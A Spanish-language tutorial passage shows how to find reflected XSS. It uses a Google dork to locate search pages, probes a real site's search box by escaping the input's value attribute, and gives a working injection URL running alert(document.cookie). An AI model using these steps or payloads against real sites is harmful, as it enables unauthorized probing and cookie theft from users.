¿Algo práctico? mmm, dirijamonos a Google para buscar
inurl:buscar.php, intentaremos encontrar algún XSS en el buscador de alguna página.
Primer resulado:
UOL :: Buscador, si nos fijamos en la URL podremos observar que el formato es el siguiente:
http://buscar.uol.com.ar/radaruol.html?q=palabraabuscar.
Ahora buscaremos
palabraabuscar en el código fuente de la página web:
<input name="q" value="palabraabuscar" type="text" size="64" class="input" >
La palabra se encuentra entre comillas, así que ahora intentaremos pasarle a la variable unas comillas para salir de
value y luego un
> para salir de la etiqueta
input.
http://buscar.uol.com.ar/radaruol.html?q=">palabraabuscar.
<input name="q" value="">palabraabuscar" type="text" size="64" class="input" >
Claramente es vulnerable a las inyecciones XSS...
http://buscar.uol.com.ar/radaruol.html?q="><script>alert(document.cookie)</script>